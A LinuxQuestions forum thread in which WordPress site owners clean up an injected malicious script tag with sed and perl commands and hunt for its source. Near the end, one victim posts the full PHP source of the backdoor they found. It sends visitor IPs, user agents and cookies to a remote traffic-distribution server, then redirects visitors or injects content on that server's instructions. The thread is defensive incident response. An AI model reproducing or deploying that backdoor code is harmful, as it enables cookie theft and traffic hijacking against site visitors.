LinuxQuestions.org

Linux - General: SSH Command to do mass search and replace (https://www.linuxquestions.org/questions/linux-general-1/ssh-command-to-do-mass-search-and-replace-4175457500/)

ryedaleblue 04-09-2013 10:18 AM

SSH Command to do mass search and replace
 
Hi everyone, new here :)

Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from:

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

Is there a quick and easy way to do this through SSH?

Any help much appreciated!

lleb 04-09-2013 04:43 PM

Let me get this straight: is that command in a number of different files, or is it in one file a number of times?

If it is a number of files, then sadly they each need to be touched.

If it is in one file a bunch of times, then any editor, text or otherwise, should be able to handle find/replace for you.

TB0ne 04-09-2013 04:53 PM

Quote:

Originally Posted by ryedaleblue (Post 4928255)
Hi everyone, new here :)
Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from
Code:

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
Is there a quick and easy way to do this through SSH? Any help much appreciated!

A few key points need to be made first:
  • If your system was compromised, then just removing some lines (ostensibly from web pages) is pointless. You need to totally rebuild your box from the ground up, with EVERYTHING clean, then harden the box THOROUGHLY, before putting any of your data back. If you don't want to rebuild, then you need to audit EVERYTHING...VERY carefully, before putting things back online.
  • SSH is only a service, providing terminal access and file transfer capabilities. It doesn't do ANY text editing in and of itself.
The sed command can do this in one of two ways. You don't say anything about the version/distro of Linux you're using, but if your version of sed supports the "-i" flag, you can do:
Code:

sed -i.bak '/<whatever>/d' *
..for in-place editing. Or, you can just bang it into a small shell script:
Code:

for file in <file pattern>
do
    # quote the name so files with spaces survive; write to a new file, leave the original as the backup
    sed '/<whatever>/d' "$file" > "$file.new_file"
done

...then you have backup copies of the old files, and new files that you can easily rename.

ryedaleblue 04-10-2013 03:26 AM

Hi

Many thanks for help

For reference, after many hours puzzling over it, this worked fine:

find . -type f -print0 | xargs -0 perl -pi -e 's/<script language="JavaScript" src="http:\/\/abtt\.tv\/modules\/mod_servises\/ua\.js" type="text\/javascript"><\/script>//g'

I found the original source of the infection, which was an outdated WP plugin. That had allowed uploading of a file which scanned all other files and, wherever it found a </head> tag, inserted that line of JS before it.

Thanks

jpollard 04-10-2013 04:52 AM

You need the additional protection that RH puts on the apache web server... (SELinux mandatory access controls).

With it, you can label static files as read only, even to the apache server that may own the files...

rizlo 04-15-2013 03:13 AM

outdated WP plugin
 
Hi ryedaleblue,
Yesterday I found exactly the same JavaScript code that infected my sites.

My server hosts some Joomla installations and only one WP.

Can you please tell me exactly what the outdated WP plugin was that compromised your site?

It seems this malicious URL is quite new; I can't find much info on it on the internet, I found just your post.

thank you in advance

ryedaleblue 04-15-2013 03:20 AM

Hi Rizlo

Unfortunately, I've not been able to pinpoint it exactly. The infection occurred in a domain that has 15 WordPress subdomains for mini sites.

The infection then spread through all sites looking for all </head> tags and inserting that line

I downloaded all the files and my antivirus picked up on a couple of hack files that had been uploaded, but they weren't in a specific plugin folder.

I've separated all the subdomains off into their own accounts on the server now to keep it isolated, and updated all plugins on all of them.

If you run that code I've put above by using SSH and navigating to the root folder for your site, that should clear it out.

You may get some warning messages about it not being able to open certain files, but it seems to clear through all text files OK.

Hope this helps

viryoulent 04-15-2013 05:43 AM

Hey guys, I have the exact same problem: it infected all WP installations on my server by adding that same tag to my <head> before the closing tag. It seems to have written it about four times to each file now. Maybe we can get together and compare plugins to pinpoint which one it is, or something, to find an official solution? As the previous gentleman stated, it is a fairly new exploit and there are no fixes that I've seen besides this one. Do I just log in through my main domain's cPanel, then go to SSH and paste this command?

Thanks in advance!

ryedaleblue 04-15-2013 05:48 AM

Yep

I just navigated to public_html then ran that.

It worked fine for me, but you may want to take a backup first!

It seems to be spreading, so I'd certainly be interested to find out what is getting exploited.

Thanks

viryoulent 04-15-2013 05:57 AM

When my hosting company did a security audit on my hosting account, they said there was only one thing found malicious, in a folder called toolbox... I've since deleted the folder, which was a WP theme... but I don't think that was the issue, as it still seems to exist. I'm going to list a few current plugins that were installed by myself and a co-worker recently (so maybe you guys can compare to your list of suspected plugins) and we can hunt the sucker down.

The only other way I can think of hunting the issue down is doxing the domain the file is hosted on (the .js) and comparing the information found to WordPress plugin authors.

Wish I knew a way of monitoring which files are writing code to others, that would solve the problem almost immediately, lol.

ryedaleblue 04-15-2013 06:04 AM

I run ConfigScanner's exploit scan service on my server, which is usually very quick at detecting hacks and quarantining them as soon as they are loaded into memory, but it missed this one, probably because it's so new and maybe also because it doesn't seem to do anything other than insert that line (as far as I've seen).

Yes I had the toolbox folder as well

viryoulent 04-15-2013 06:05 AM

Odd, I deleted the toolbox folder, but it appears one file won't delete. Hrm... any ideas on your end if this is the folder causing the issue? The file is wp-status.php. It won't let me delete, edit or even view the file... tried chmodding it and everything... not sure what to do. Wonder if this is the cause of the issue?

jpollard 04-15-2013 07:05 AM

Quote:

Originally Posted by viryoulent (Post 4931774)
Odd, I deleted the toolbox folder, but it appears one file won't delete. Hrm... any ideas on your end if this is the folder causing the issue? The file is wp-status.php. It won't let me delete, edit or even view the file... tried chmodding it and everything... not sure what to do. Wonder if this is the cause of the issue?

What is your system?

For that file, you might check to see if it is marked "immutable". If it is, you need to replace the entire system as the only way that could have been set is by root.

And if it isn't RH based with SELinux enabled, you do have a problem. The RH based SELinux security models compartmentalize apache such that penetrations are confined to just files apache can write/update, with no access to system files or configuration files.

viryoulent 04-15-2013 09:36 AM

That file that wouldn't let me remove it: I finally got my host to edit permissions on it, so I was able to view/remove it. This is what the file code contained; not sure if a PHP guru can decode it to see if this is actually the cause of the issue that's writing the script tag to each file containing the head? If not, then the toolbox folder can't be the cause, because that's the only file that remains in the directory now.


PHP Code:

<?php
// Config block: TDS (traffic distribution system) URL and IP, a fallback URL ($lin),
// a campaign id ($esdid) and the key that gates the web config form below.
$tds="http://sydinex.net/TDS.post.php";
$tdsip="94.250.251.43";
$lin="";
$esdid="any";
$key="gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs";
?>
<?php
//ConfGui
// ?mode=config&key=... prints an HTML form for the values above; ?mode=setconfig&key=...
// rewrites the first line of this very file with the POSTed values, splitting on a
// marker that is assembled from two string pieces so the marker never appears verbatim.
error_reporting(0);
$mode=$_GET["mode"];if($mode=="config" AND $key==$_GET['key']){
echo '<form name="form1" method="post" action=http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?mode=setconfig&key='.$_GET['key'].'>
<table border="0"><tr><td>TDS</td><td><input type="text" name="ptds" value="'.$tds.'"></td><td>TDS IP</td>
<td><input type="text" name="ptdsip" value="'.$tdsip.'"></td><td>KEY</td><td><input type="text" name="pkey" value="'.$key.'"></td>
</tr><tr><td>Reserve</td><td><input type="text" name="pto" value="'.$lin.'"></td><td>ESD ID</td><td><input type="text" name="pesdid" value="'.$esdid.'"></td>
<td colspan="2"><input type="submit" name="Submit" value="ok"></td></tr></table></form>';die();}if($mode=="setconfig" AND $key==$_GET['key']){
$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}
        $getlpa=file($scr);
        $strng=$getlpa[0];
$file=file($scr);
for($i=0;$i<sizeof($file);$i++)
if($i==0) {
$ka='<?//BRE';$kaka=$ka.'ACK//?>';
$felp = explode($kaka, $file[$i]);
$file[$i]='<?$tds="'.$_POST["ptds"].'";$tdsip="'.$_POST["ptdsip"].'";$lin="'.$_POST["pto"].'";$esdid="'.$_POST["pesdid"].'";$key="'.$_POST["pkey"].'";?>'.$kaka.$felp[1];
}
$fp=fopen($scr,"w");
fputs($fp,implode("",$file));
fclose($fp);
}
//send
// Beacon: opens a raw socket to the TDS (by IP if one is set) and reports the visitor's
// host, referrer, IP, proxy flag, user agent and cookies (or query string); the response
// body tells this script what to do with the visitor.
$dom = explode("/", $tds);$dom=$dom[2];$dhost=$dom;if($tdsip){$dom=$tdsip;}
$fp = fsockopen($dom, 80, $errno, $errstr, 2);
if (!$fp) {$res=1;} else {
$t_dom=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);
$t_ref=urlencode($_SERVER[HTTP_REFERER]);
$t_ip=urlencode($_SERVER["REMOTE_ADDR"]);
$t_prox='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$t_prox='yes';}
$t_agent=urlencode($_SERVER['HTTP_USER_AGENT']);
foreach($_COOKIE as $key=>$val) {$t_cookie=$t_cookie."&".$key."=".$val;}$t_cookie=urlencode($t_cookie);
if(empty($t_cookie)){$t_cookie=urlencode($_SERVER['QUERY_STRING']);}
    $out = "GET ".$tds."?dom=".$t_dom."&ref=".$t_ref."&ip=".$t_ip."&prox=".$t_prox."&agent=".$t_agent."&cookie=".$t_cookie."&esdid=".$esdid." HTTP/1.0\r\n";
    $out .= "Host: ".$dhost."\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);       
while (!feof($fp)) {$str=fgets($fp,128);$ch.=$str;if ($str=="\r\n" && empty($he)){$he = 'do';}if ($he=='do'){$goto.=$str;}}fclose ($fp);}$goto=substr($goto, 2);       
// Act on the response: on connection failure or a non-200 status the fallback $lin is
// used; an http:// answer becomes a 302 redirect, cook:// sets cookies, echo:// prints
// the body into the page.
$ch=explode(" ", $ch);if($res){$goto=$lin;}if($ch[1]=='200'){}else{$goto=$lin;}$gotoe = explode("://", $goto);
If($gotoe[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$goto);} $goto_body=substr($goto,7);
If($gotoe[0]=='cook'){$gotoee=explode("&", $goto_body);foreach($gotoee as $setcook){$set=explode("=", $setcook);setcookie($set[0], $set[1]);}}
If($gotoe[0]=='echo'){echo $goto_body;}
?>


viryoulent 04-15-2013 09:59 AM

After going through it, I'm pretty confident in saying that this is the cause of the issue, and once it's removed and the shell command is run it should be fine.

